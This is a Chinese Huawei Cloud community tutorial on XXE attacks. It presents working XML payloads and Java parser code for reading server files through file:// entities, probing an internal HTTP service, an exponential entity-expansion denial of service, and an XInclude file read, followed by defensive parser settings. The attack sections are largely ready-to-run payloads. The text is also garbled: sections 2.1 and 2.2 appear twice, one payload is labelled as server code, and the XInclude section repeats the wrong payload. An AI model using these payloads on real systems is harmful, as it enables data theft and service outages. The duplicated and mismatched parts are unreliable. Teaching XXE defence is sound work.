本文分享自华为云社区《【安全攻防】深入浅出实战系列专题-XXE攻击》,作者: MDKing。
1 基本概念
XML 基础:XML 指可扩展标记语言(Extensible Markup Language),是一种与 HTML 类似的纯文本的标记语言,设计宗旨是为了传输数据,而非显示数据。是 W3C 的推荐标准。
XML 标签:XML 被设计为具有自我描述性,XML 标签是没有被预定义的,需要自行定义标签与文档结构。如下为包含了标题、发送者、接受者、内容等信息的 xml 文档。
DTD:指文档类型定义(Document Type Definition),通过定义根节点、元素(ELEMENT)、属性(ATTLIST)、实体(ENTITY)等约束了 xml 文档的内容按照指定的格式承载数据。
如下图,通过<!DOCTYPE 根节点名称 [DTD内容]>的规则指定了该 xml 文件合法的根节点元素为 persons,它的子节点元素为 person,以及 person 的子层元素以及属性。
(另外:可通过<!DOCTYPE 根节点名称 SYSTEM "DTD 文件名">的方式引入外部的 DTD 定义文件)
实体:在 DTD 中通过<!ENTITY 实体名称 "实体的值">等方式定义实体,相当于定义变量的作用,可在文档内容中通过&实体名称;的方式引用实体的值(变量的值)。
实体类型:实体分为多种类型,从使用范围的维度,分为参数实体(只能在 DTD 中引用)与非参数实体(可以在 DTD 中、文档内容中引用)。区别如下:
从值的来源维度,分为内部实体、外部实体。内部实体为文档内部直接定义值,外部实体为通过 http、file 等协议从文件外的某处获取内容作为实体的值。区别如下:
XML 外部实体注入:XML External Entity Injection 即 xml 外部实体注入漏洞,简称 XXE 漏洞。当 xml 解析器支持对于外部实体的解析且待解析的 xml 文件可由外部控制时,就会发生此攻击。攻击者可以通过构造外部实体的内容为本地其它目录下的文件、访问内网/外网的制定 url 等方式实现自己的攻击目的,达到信息泄露、命令执行、拒绝服务、SSRF、内网端口扫描等攻击目的。
Xinclude:Xinclude 用来导入外部 xml 文档,类似于 php 的 include,将外部定义的 dtd 引入当前文件。该特性可以解决部分场景下引入外部实体具有的局限性,但并不是所有 XML 解析器都支持 XInclude,W3C 在 XInclude Implementations Report 中列出了支持的列表,结合 XInclude 特性也可以在部分场景下执行 XXE 攻击。常见的支持 xinclude 特性的 xml 解析器都是默认关闭 xinclude 特性的,如果使用,需要在代码中手动开启,如在 DOM 型解析器中开启如下配置factory.setNamespaceAware(true);factory.setXIncludeAware(true);如果不关闭 Xinclude,仅禁用 DTD 解析也是存在安全风险的。
2 常见攻击场景实战演练
2.1 服务器文件读取(信息泄露)
目的与场景:通过构造特定格式的 xml 文档,读取服务器上指定文件的内容,达到敏感信息获取的目的。
xml 文档 payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ELEMENT root (#PCDATA)> <!ENTITY pw SYSTEM "file:///D:/securetest/xxe/passwd.txt">]><root>&pw;</root>
复制代码
服务器端代码:
public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException { String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<!DOCTYPE root [ \n" + "\t<!ELEMENT root (#PCDATA)>\n" + "\t<!ENTITY pw SYSTEM \"file:///D:/securetest/xxe/passwd.txt\">]>\n" + "<root>&pw;</root>"; DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setValidating(true); DocumentBuilder builder = factory.newDocumentBuilder(); InputStream in = new ByteArrayInputStream(xml.getBytes()); org.w3c.dom.Document document = builder.parse(in); Element rootElement = document.getDocumentElement();
// 打印根节点元素名称、内容 System.out.println("根节点名称:" + rootElement.getNodeName()); System.out.println("根节点内容:" + rootElement.getTextContent());}
复制代码
执行结果:成功读取到了 passwd.txt 的内容。(服务端代码样例中打印在控制台上,对应实际系统中需要有将文档内容打印到界面上等处理。)
2.2 内网信息探测
目的与场景:通过构造特定格式的 xml 文档,可以借助目标主机访问内网的其它主机开放的内部接口等服务。
内网其它服务器模拟准备:通过 node staticServer.js 命令启动服务器,监听 3000 端口
let express = require('express')let app = express();app.use(express.static(__dirname));app.get('/getInnerData', function(req, res) { console.log(req.headers) res.end('AK:abc;SK:ABDCEF')})app.listen(3000)
复制代码
经验证,http 请求可成功返回
xml 文档 payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ELEMENT root (#PCDATA)> <!ENTITY pw SYSTEM "http://127.0.0.1:3000/getInnerData">]><root>&pw;</root>
复制代码
服务器端代码:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ELEMENT root (#PCDATA)> <!ENTITY pw SYSTEM "file:///D:/securetest/xxe/passwd.txt">]><root>&pw;</root>
复制代码
服务器端代码:
public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException { String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<!DOCTYPE root [ \n" + "\t<!ELEMENT root (#PCDATA)>\n" + "\t<!ENTITY pw SYSTEM \"file:///D:/securetest/xxe/passwd.txt\">]>\n" + "<root>&pw;</root>"; DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setValidating(true); DocumentBuilder builder = factory.newDocumentBuilder(); InputStream in = new ByteArrayInputStream(xml.getBytes()); org.w3c.dom.Document document = builder.parse(in); Element rootElement = document.getDocumentElement();
// 打印根节点元素名称、内容 System.out.println("根节点名称:" + rootElement.getNodeName()); System.out.println("根节点内容:" + rootElement.getTextContent());}
复制代码
执行结果:成功读取到了 passwd.txt 的内容。(服务端代码样例中打印在控制台上,对应实际系统中需要有将文档内容打印到界面上等处理。)
2.2 内网信息探测
目的与场景:通过构造特定格式的 xml 文档,可以借助目标主机访问内网的其它主机开放的内部接口等服务。
内网其它服务器模拟准备:通过 node staticServer.js 命令启动服务器,监听 3000 端口
let express = require('express')let app = express();app.use(express.static(__dirname));app.get('/getInnerData', function(req, res) { console.log(req.headers) res.end('AK:abc;SK:ABDCEF')})app.listen(3000)
复制代码
经验证,http 请求可成功返回
xml 文档 payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ELEMENT root (#PCDATA)> <!ENTITY pw SYSTEM "http://127.0.0.1:3000/getInnerData">]><root>&pw;</root>
复制代码
服务器端代码:
public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException { String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<!DOCTYPE root [ \n" + "\t<!ELEMENT root (#PCDATA)>\n" + "\t<!ENTITY pw SYSTEM \"http://127.0.0.1:3000/getInnerData\">]>\n" + "<root>&pw;</root>"; DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setValidating(true); DocumentBuilder builder = factory.newDocumentBuilder(); InputStream in = new ByteArrayInputStream(xml.getBytes()); org.w3c.dom.Document document = builder.parse(in); Element rootElement = document.getDocumentElement();
// 打印根节点元素名称、内容 System.out.println("根节点名称:" + rootElement.getNodeName()); System.out.println("根节点内容:" + rootElement.getTextContent()); }
复制代码
执行结果:成功读取到内部接口 getInnerData 的内容。
2.3 DDos 攻击
目的与场景:通过构造特殊格式的 xml 文档,定义多层递归引用的实体(变量)让解析的内容以及时间以指数级增长,以实现 DDos 攻击的效果。
xml 文档 payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ELEMENT root (#PCDATA)> <!ENTITY lol "lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">]><root>&lol6;</root>
复制代码
服务器端代码:
public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException { // 获取当前时间 LocalDateTime startTime = LocalDateTime.now(); String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<!DOCTYPE root [ \n" + "\t<!ELEMENT root (#PCDATA)>\n" + "\t<!ENTITY lol \"lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n\">\n" + "\t<!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n" + "\t<!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\n" + "\t<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n" + "\t<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\n" + "\t<!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\n" + "\t<!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;\">]>\n" + "<root>&lol6;</root>"; DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setValidating(true); factory.setExpandEntityReferences(false); System.setProperty("entityExpansionLimit", "50000000"); DocumentBuilder builder = factory.newDocumentBuilder(); InputStream in = new ByteArrayInputStream(xml.getBytes()); org.w3c.dom.Document document = builder.parse(in); Element rootElement = document.getDocumentElement();
// 打印根节点元素名称、内容 System.out.println("根节点名称:" + rootElement.getNodeName()); System.out.println("根节点内容:" + rootElement.getTextContent()); System.out.println("根节点内容长度:" + rootElement.getTextContent().length()); System.out.println("根节点内容大小:" + rootElement.getTextContent().getBytes().length / (1024 * 1024) + "MB");
// 获取当前时间并计算时间差 LocalDateTime endTime = LocalDateTime.now(); Duration duration = Duration.between(startTime, endTime); System.out.println("解析执行时间为:" + duration.toMillis() + "豪秒");}
复制代码
执行结果:如果程序中不对解析实体做限制的话,可以通过少量的 DTD 定义,实现海量大小的解析结果的效果,会大量占用服务器的处理、存储。
2.4 Xinclude 攻击演示
目的与场景:该样例演示了如果打开了 Xinclude 开关的危险性,即使做了 DTD 的安全禁用,还是依然可以进行 XXE 攻击。
xml 文档 payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ELEMENT root (#PCDATA)> <!ENTITY lol "lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">]><root>&lol6;</root>
复制代码
服务端代码:
public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException { String xml = "<?xml version=\"1.0\" ?>\n" + "<root xmlns:xi=\"http://www.w3.org/2001/XInclude\">\n" + "<xi:include href=\"file:///D:/securetest/xxe/passwd.txt\" parse=\"text\"/>\n" + "</root>"; DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setNamespaceAware(true); factory.setXIncludeAware(true); DocumentBuilder builder = factory.newDocumentBuilder(); InputStream in = new ByteArrayInputStream(xml.getBytes()); org.w3c.dom.Document document = builder.parse(in); Element rootElement = document.getDocumentElement();
// 打印根节点元素名称、内容 System.out.println("根节点名称:" + rootElement.getNodeName()); System.out.println("根节点内容:" + rootElement.getTextContent());}
复制代码
执行结果:
3 安全编码防御
3.1 禁止打开 Xinclude 开关
常见的支持 xinclude 特性的 xml 解析器都是默认关闭 xinclude 特性的,如果使用,需要在代码中手动开启,如在 DOM 型解析器中开启如下配置factory.setNamespaceAware(true);factory.setXIncludeAware(true);如果不关闭 Xinclude,仅禁用 DTD 解析也是存在安全风险的。2.4 中演示了即使禁用了 DTD 解析,打开 Xinclude 功能开关后存在的安全问题。所以从安全角度考虑,首先禁止打开 Xinclude 开关。
3.2 禁用 DTD 解析
如果业务中不需要进行 DTD 定义以及解析,最好的方式就是完全禁用 DTD 解析。例如 Dom 类型的解析器中通过factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);来禁用。效果如下:
3.3 禁用外部实体解析
方式一:如果业务中确实需要 DTD 定义以及解析,可以通过仅禁用外部实体解析的方式进行安全防护。例如 Dom 类型的解析器中通过如下方式设置禁用外部实体解析:
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
复制代码
效果如下:
方式二:禁用外部实体解析还有另外一种方式,重写实体解析函数,核心代码:
builder.setEntityResolver(new EntityResolver() { @Override public InputSource resolveEntity(String publicId, String systemId) throws SAXException,IOException { return new InputSource(new StringReader("")); }});
复制代码
效果如下:
4 安全编码扫描工具
IoT 已将包括上述安全编码逻辑在内的常用 XML 解析器的安全编码规范提取到 IoT 自定义安全规则集,上线到所有 IoT 服务的生产发布流水线中,自动化的保障各服务的现网代码安全。如:
点击关注,第一时间了解华为云新鲜技术~
评论